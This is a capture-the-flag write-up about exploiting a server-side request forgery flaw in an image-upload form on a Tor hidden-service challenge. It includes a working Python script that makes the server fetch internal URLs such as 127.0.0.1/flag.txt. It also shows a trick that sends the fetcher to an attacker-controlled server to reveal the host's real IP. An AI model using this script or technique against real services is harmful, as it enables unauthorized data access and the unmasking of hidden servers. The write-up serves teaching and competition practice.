A new black market has appeared and has been targeted by the FBI. After checking for suspicious posts on stackoverflow and finding nothing, they give up and are offering a bounty to anyone who can get information on the server that is hosting the hidden service. Link http://mq72g4732yorslzf.onion/
Ok the server is on an .onion domain! Let’s go, setting up tor project and connect to the hidden service, the Black Market! First, we discover the home page of this market, containing useful things :D.
There is a button at the top right of the home page, this button point to an upload page http://mq72g4732yorslzf.onion/upload.php
.
User have the choice to upload an image from his computer, or specifying an url to the image.
Ok, validate the form with this url: http://3l1t3h4x0r.com/haxor.gif
After form submitted, we are redirect to the same page upload.php
and the image is displayed at the bottom of the page.
Ok, so where is stored uploaded image ? Take a look to the html source:
<img src="data:image/gif;base64,R0lGODlhpQ[...]MKAIRAAA7"/>
We can see at the end of html source that the image isn’t stored but displayed as base64 data. Ok, there is something here :). I therefore write a little script to upload and read base64 data:
""" Usage:
This script must be run in tor proxy to access onion target!
It take 1 argument, that is the url where will be uploaded image and print HTTP response
$ proxychains python upload-black-market.py "http://127.0.0.1/flag.txt"
"""
import sys, re, base64
import httplib, urllib
data = urllib.urlencode({"url": sys.argv[1], "upload": "Upload"})
h = httplib.HTTPConnection('mq72g4732yorslzf.onion:80')
headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"}
h.request('POST', '/upload.php', data, headers)
r = h.getresponse()
b64 = re.search("(?<=base64,)(.*)\"", r.read()).group(1)
print b64
print base64.b64decode(b64)
After multiple attempt to find something interesting, an other member of my team help me..
- Hey, and if you give an url to your serv you can get the IP of the fetcher..
- Oh yeah: Why I have not thought earlier!!
So:
$ proxychains python upload-black-market.py "http://myserv.com/black-market"
And in my logs:
212.83.153.197 - - [05/Apr/2014:18:20:48 +0200] "GET /black-market HTTP/1.1" 403 439 "-" "-"
Thanks jpic!! :)
We can found the flag at http://212.83.153.197
He started screaming at me saying weird shit I didn’t understand, then he just lookde blank and mumbled: “The flag .. The flag.. It is ’0hSh1t1r4n0ut0fn00dl35′. And then he just died in front of me.